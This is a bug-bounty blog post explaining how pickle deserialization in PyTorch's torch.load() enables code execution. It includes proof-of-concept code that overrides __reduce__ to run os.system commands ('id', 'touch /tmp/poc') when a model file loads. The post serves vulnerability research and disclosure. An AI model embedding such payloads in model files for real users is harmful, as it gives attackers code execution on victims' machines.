March 4, 2025

Don’t Trust Your Model: How a Malicious Pickle Payload in PyTorch Can Execute Code

# Pickle Deserialization
# Bug Bounty Tips
# PyTorch
# Model File Vulnerability
# AI Model File Formats

PyTorch Pickle Vulnerability Exposed

Ethan Silvas
In this blog, we're breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like PyTorch can be exploited. This example is a perfect starting point if you're looking to find and report your own MFVs on huntr.


The Vulnerability Explained

The Role of Pickle in PyTorch

  • Serialization with pickle: PyTorch uses Python’s pickle module for its torch.save() and torch.load() functions. This allows models to be saved and reloaded with ease.
  • The Risk Factor: The pickle protocol involves calling an object's __reduce__ method to determine how to rebuild it. If an attacker can override this method, they can control what happens during deserialization, leading to arbitrary code execution (see the sketch below).
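Here's a minimal, framework-agnostic sketch of that risk, using only Python's standard library (the Exploit class name and the id command are illustrative, not part of the PyTorch PoC):

```python
import os
import pickle

class Exploit:
    def __reduce__(self):
        # pickle records this (callable, args) pair in the serialized bytes;
        # unpickling calls os.system("id") to "rebuild" the object.
        return (os.system, ("id",))

payload = pickle.dumps(Exploit())

# Deserializing attacker-controlled bytes runs the command immediately.
pickle.loads(payload)
```

Any format that wraps pickle, including PyTorch's default torch.save()/torch.load() serialization, inherits this behavior.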


A Step-by-Step Walkthrough

Crafting the Malicious Model:
A custom PyTorch module is defined to override __reduce__. In our proof-of-concept (PoC), the overridden method instructs the deserialization process to run an OS command—touch /tmp/poc—as soon as the model is loaded.
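A minimal sketch of that crafting step could look like the following; the MaliciousModel class name and the malicious_model.pt filename are illustrative choices, not necessarily the exact PoC as submitted:

```python
import os
import torch
import torch.nn as nn

class MaliciousModel(nn.Module):
    """Looks like an ordinary module, but hijacks its own pickling."""

    def __reduce__(self):
        # Instead of describing how to rebuild the module, tell pickle to
        # call os.system("touch /tmp/poc") during deserialization.
        return (os.system, ("touch /tmp/poc",))

# torch.save() pickles the module object, overridden __reduce__ and all.
torch.save(MaliciousModel(), "malicious_model.pt")
```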
Executing the Payload:
When an unsuspecting user tries to load the model using the standard torch.load() call, the payload triggers and executes arbitrary Python code.

This PoC uses that code execution for a simple, visible demonstration: creating the file /tmp/poc on the victim's machine.
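On the victim's side, the loading step is just the everyday workflow; here is a sketch, assuming the file from the sketch above (note that PyTorch 2.6 and later default torch.load() to weights_only=True, so this class of payload only fires when that safeguard is absent or explicitly disabled):

```python
import os
import torch

# Loading the untrusted file unpickles it; weights_only=False reproduces the
# older default behavior that allows arbitrary objects (and code) through.
result = torch.load("malicious_model.pt", weights_only=False)

# The command has already run by the time load() returns; the returned value is
# just os.system's exit status, and /tmp/poc now exists.
print(os.path.exists("/tmp/poc"))  # True on the victim's machine
```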


Why Should You Care?

This vulnerability isn’t just a textbook case—it’s a gold mine for anyone looking to cash in on easy, high-impact exploits. Here’s why you should be all over it:
  • Endless Discovery Potential: Use this PoC as a launchpad to explore similar vulnerabilities across various model formats.
  • Lucrative Rewards: With huntr offering up to $4,000 per validated MFV, your next discovery could be both a reputation boost and a major payday.


Get Involved

This example MFV shows that even the most trusted machine learning frameworks can be exploited. By understanding the mechanics of PyTorch’s pickle deserialization, you can turn this knowledge into actionable insights—finding and reporting vulnerabilities before they can be exploited in the wild.
At huntr, we offer bounty payouts up to $4,000 per validated MFV. If you have discovered a vulnerability in how models are serialized or can demonstrate a novel exploit, submit your detailed proof-of-concept (PoC) via our submission portal. Happy hunting!